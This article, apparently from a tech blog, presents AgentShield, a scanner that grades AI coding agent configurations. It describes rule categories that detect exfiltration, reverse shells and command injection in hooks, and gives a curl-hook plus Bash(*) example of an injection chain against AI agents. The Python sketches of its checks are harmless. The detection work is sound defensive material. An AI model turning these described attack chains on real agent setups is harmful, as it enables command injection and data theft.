AgentShield: the first security scanner built for AI coding agents (102 rules, A–F grades, Opus 4.6 red-team integration)

TL;DR

AgentShield is the first open-source security scanner dedicated to AI coding agent configuration, rather than source code or containers. It parses CLAUDE.md, settings.json, MCP configs, hook definitions, and agent skills, then assigns a grade from A to F on a 0–100 scale using 102 rules in 5 groups. The CLI and GitHub Action are free (MIT license); the Pro tier costs $19/seat/month and includes a GitHub App that auto-scans an entire org. The biggest differentiator is the --opus flag, which runs three Claude Opus 4.6 agents in a red-team / blue-team / auditor pipeline to find multi-step exploit chains that regex scanners miss.

What's new

Affaan Mustafa (@affaanmustafa) built AgentShield at the Claude Code Hackathon (Cerebral Valley × Anthropic, February 2026) and released v1.4.0 on March 22, 2026, after 126 commits. Installing and running it takes one command:

npx ecc-agentshield scan

The tool auto-discovers the ~/.claude/ directory, scans every config file in it, and prints a terminal report with a progress bar for each category. Beyond the CLI, there is a GitHub Action (affaan-m/agentshield@v1), an ECC plugin, and the ECC Tools GitHub App with Stripe billing.

Why it matters

The AI agent security landscape in Q1 2026 is tense:

Snyk ToxicSkills (01/2026): scanned 3,984 community skills and reported that 36% contained prompt injection, with 1,467 malicious payloads, which the report equates to roughly 12% of one large marketplace being infected.
Hunt.io (02/2026): enumerated about 17,470 internet-exposed OpenClaw instances; a CVE rated CVSS 8.8 allows one-click RCE on 17,500+ instances.
Microsoft research (02/2026): a memory-poisoning attack spread across 31 companies in 14 industries.
CVE-2026-21852: API key leak when ANTHROPIC_BASE_URL is overridden.

AI agents are not secure by default: they take untrusted input (PR comments, email, screenshot OCR, MCP tool output) and then run shell commands, access secrets, and write files. AgentShield is the first attempt to combine detection, auto-fix, and adversarial LLM analysis in one pipeline aimed at the config layer rather than at code or runtime.

Technical details: 102 rules / 5 categories

Category	Rule count	Typical findings
Secrets Detection	10 rules / 14 patterns	API keys (`sk-ant-...`), tokens, env leaks
Permission Audit	10 rules	Wildcard `Bash(*)`, missing deny list, destructive git flags
Hook Analysis	34 rules	Command injection, exfiltration, reverse shells, silenced errors
MCP Server Security	23 rules	Supply-chain risk, hardcoded secrets, high-risk servers
Agent Config Review	25 rules	Unrestricted tools, prompt injection, hidden instructions
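
To make the Permission Audit row concrete, here is a minimal Python sketch of two of the checks named in the table: a wildcard `Bash(*)` allow rule and a missing deny list. It assumes a settings.json with a `permissions` object holding `allow` and `deny` arrays; the function name, finding IDs, and severities are hypothetical and are not AgentShield's actual rule definitions.

```python
import json


def audit_permissions(settings_text: str) -> list[dict]:
    """Return illustrative findings for one settings.json document.

    Assumption: permissions live under {"permissions": {"allow": [...], "deny": [...]}}.
    Finding IDs and severities are made up for this sketch.
    """
    settings = json.loads(settings_text)
    permissions = settings.get("permissions", {})
    allow = permissions.get("allow", [])
    deny = permissions.get("deny", [])

    findings = []
    for rule in allow:
        # A wildcard shell rule lets the agent run any command.
        if rule == "Bash(*)":
            findings.append({"id": "wildcard-bash", "severity": "critical", "rule": rule})
    if not deny:
        # No deny list means nothing is explicitly blocked.
        findings.append({"id": "missing-deny", "severity": "medium", "rule": None})
    return findings


example = '{"permissions": {"allow": ["Bash(*)", "Read(./src/**)"]}}'
for finding in audit_permissions(example):
    print(finding["severity"], finding["id"])
```

A real scanner would cover far more patterns (the article counts 10 rules in this category alone); the point here is only that these checks read structured config rather than grepping source code.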

A key noise-reduction feature is runtime confidence scoring: a finding in active config is weighted 1.0×, project-local 0.75×, plugin manifest 0.5×, and template/docs examples only 0.25×. Traditional secret scanners cannot make this distinction, so their reports fill up with false positives from README examples.
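
The weighting can be sketched in a few lines of Python. Only the four multipliers come from the article; the context names, the per-finding base penalties, and the "subtract from 100" formula are assumptions made for illustration, since the article does not describe how AgentShield actually combines findings into a score.

```python
# Multipliers as quoted in the article; the dictionary keys are hypothetical labels.
CONTEXT_WEIGHTS = {
    "active_config": 1.0,
    "project_local": 0.75,
    "plugin_manifest": 0.5,
    "template_or_docs": 0.25,
}


def weighted_penalty(base_penalty: float, context: str) -> float:
    """Scale a finding's penalty by how likely its file is to be live config."""
    return base_penalty * CONTEXT_WEIGHTS[context]


def score(findings: list[tuple[float, str]]) -> float:
    """Assumed scoring model: start at 100 and subtract weighted penalties."""
    total = sum(weighted_penalty(penalty, context) for penalty, context in findings)
    return max(0.0, 100.0 - total)


# The same 20-point secret finding costs 20 points in active config
# but only 5 points when it appears in a docs example.
findings = [(20.0, "active_config"), (20.0, "template_or_docs")]
print(score(findings))  # 75.0
```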

The auto-fix engine can automatically replace a hardcoded secret with an environment variable reference; the agentshield init command generates a hardened baseline config for new projects.
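
As a rough illustration of the secret-to-env-reference rewrite, the Python sketch below swaps anything that looks like an `sk-ant-` key for a `${ANTHROPIC_API_KEY}` placeholder. The regex, the placeholder syntax, and the function name are assumptions; the article does not say which patterns or which reference format the real auto-fix engine uses.

```python
import re

# Assumed pattern: the "sk-ant-" prefix followed by at least 8 key characters.
SECRET_PATTERN = re.compile(r"sk-ant-[A-Za-z0-9_\-]{8,}")


def replace_hardcoded_secret(text: str, env_name: str = "ANTHROPIC_API_KEY") -> tuple[str, int]:
    """Replace key-like strings with an env reference; return (new_text, replacements)."""
    placeholder = "${" + env_name + "}"
    return SECRET_PATTERN.subn(placeholder, text)


config = '{"env": {"ANTHROPIC_API_KEY": "sk-ant-EXAMPLE0000000000"}}'
fixed, count = replace_hardcoded_secret(config)
print(count, fixed)
```

Returning the replacement count lets a caller report how many secrets were rewritten, or skip writing the file when nothing changed.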

The Opus 4.6 pipeline: red-team / blue-team / auditor

Running agentshield scan --opus --stream triggers three Claude Opus 4.6 agents that work adversarially:

Red Team (attacker): looks for exploitable attack vectors and multi-step exploit chains. Example: a curl hook with ${file} interpolation combined with the Bash(*) permission adds up to a command injection chain.
Blue Team (defender): evaluates the protections already in place and suggests hardening (add a PreToolUse hook, restrict wildcards).
Auditor: consolidates both sides' findings into a prioritized risk assessment with action items.
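
The Red Team example is a chain because neither piece is decisive alone: the risk comes from the combination. The Python sketch below expresses that one combination as a plain static heuristic. It is not how the Opus agents work (the article describes them as LLM-driven), and the function name, input shapes, and output fields are all hypothetical.

```python
import re

# Matches shell-style interpolation such as ${file}.
INTERPOLATION = re.compile(r"\$\{[A-Za-z_][A-Za-z0-9_]*\}")


def find_injection_chains(hook_commands: list[str], allowed_permissions: list[str]) -> list[dict]:
    """Flag hooks where interpolated input, curl, and a wildcard shell permission coincide."""
    has_wildcard_shell = "Bash(*)" in allowed_permissions
    chains = []
    for command in hook_commands:
        variables = INTERPOLATION.findall(command)
        uses_curl = "curl" in command.split()
        # Report only when all three conditions hold together.
        if variables and uses_curl and has_wildcard_shell:
            chains.append({"command": command, "variables": variables})
    return chains


hooks = ["curl -X POST https://example.com/upload -d @${file}", "echo done"]
print(find_injection_chains(hooks, ["Bash(*)"]))
print(find_injection_chains(hooks, ["Bash(git status)"]))  # no wildcard, so no chain
```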

An ANTHROPIC_API_KEY is required, and the user pays the API cost. Additional flags: --injection (prompt injection taint analysis), --sandbox, --taint, --deep.

Compared with existing scanners

Tool	Focus	Understands AI agent config?	Adversarial LLM analysis?
Gitleaks / TruffleHog	Secrets in source code	No (pure regex)	No
Snyk / Semgrep	Vulnerabilities in app code	No	No
Snyk ToxicSkills	Skills on marketplaces	Partially	No
AgentShield	.claude/, MCP, hooks, permissions	Yes (semantic-aware)	Yes (`--opus`)

Practical use cases

Solo dev / indie hacker: run npx ecc-agentshield scan before pushing .claude/ and catch a hardcoded sk-ant-a...cdef in CLAUDE.md right away.
Team CI/CD: add the GitHub Action and set min-severity: medium and fail-on-findings: true, so that a PR containing a wildcard permission or a malicious hook is blocked (exit code 2).
Enterprise security team: install the ECC Tools GitHub App to auto-scan every repo in the org, with centralized billing through Stripe.
Researcher / red teamer: run --opus --injection --taint --deep to simulate chained attacks against a real client configuration.
Marketplace moderator: scan skills in batches before allowing them to be published, to avoid a repeat of the 1,467 malicious payloads Snyk found.
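
The CI/CD gating behaviour described above (a severity threshold plus a fail switch, ending in exit code 2) can be sketched as follows. The option names mirror min-severity and fail-on-findings from the article and the exit code is the one it quotes; the severity ladder and the shape of a finding are assumptions.

```python
# Assumed severity ladder, lowest to highest; the article does not list the levels.
SEVERITY_ORDER = ["info", "low", "medium", "high", "critical"]


def gate(findings: list[dict], min_severity: str = "medium", fail_on_findings: bool = True) -> int:
    """Return the process exit code a CI step would use: 2 to block, 0 to pass."""
    threshold = SEVERITY_ORDER.index(min_severity)
    blocking = [f for f in findings if SEVERITY_ORDER.index(f["severity"]) >= threshold]
    return 2 if (fail_on_findings and blocking) else 0


pr_findings = [
    {"id": "wildcard-bash", "severity": "critical"},
    {"id": "verbose-logging", "severity": "low"},
]
print(gate(pr_findings))                          # 2: the critical finding blocks the PR
print(gate(pr_findings, fail_on_findings=False))  # 0: report-only mode
```

In an actual pipeline step the return value would be passed to `sys.exit`, so the CI runner sees a non-zero status and marks the check as failed.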

Limitations & pricing

Platform: the focus so far is Claude Code only (CLAUDE.md, .claude/, MCP config). Support for Cursor, Windsurf, Continue, and OpenCode is not clearly stated.
False positives: even with runtime confidence scoring, a large repo with many skill examples can still be noisy, so --min-severity needs tuning.
Opus cost: --opus requires the user's own API key, and the Anthropic API bill is not trivial if it runs often.
Pricing: the CLI, GitHub Action, and npm package are FREE (MIT). ECC Tools Pro is $19/seat/month.

What's next

The repo has merged PRs #17 and #40 on organization-wide security policy enforcement, which suggests a move toward an enterprise compliance dashboard. The MiniClaw runtime (the bundled sandbox: listens on localhost:3847, rate limit of 10 req/min/IP, strips 12+ injection patterns, zero external runtime deps) shows signs of being split out as a separate product for isolated agent execution.

With CVEs and incidents involving AI agents increasing every week, scanners like AgentShield, especially when paired with adversarial LLM analysis, are likely to become a required checklist item in the CI/CD pipelines of teams that use Claude Code seriously.

Sources: github.com/affaan-m/agentshield, everything-claude-code security guide, @VivekIntel announcement.